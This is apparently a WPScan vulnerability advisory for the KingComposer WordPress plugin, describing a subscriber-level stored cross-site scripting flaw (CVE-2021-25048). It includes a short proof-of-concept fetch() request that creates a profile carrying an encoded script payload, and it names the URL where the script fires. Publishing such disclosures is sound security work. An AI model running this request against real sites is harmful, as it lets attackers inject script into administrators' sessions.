WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting

Description

The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them

Proof of Concept

Create profile:

fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"name":"y", "slug": "y", "data": btoa("<script>alert(1);</script>")}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y

Affects Plugins

kingcomposer
No known fix - plugin closed

References

CVE
CVE-2021-25048

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
5687e5db-d987-416d-a7f4-036cce4d56cb

Timeline

Publicly Published

2022-03-14 (about 10 months ago)

Added

2022-03-14 (about 10 months ago)

Last Updated

2022-04-11 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin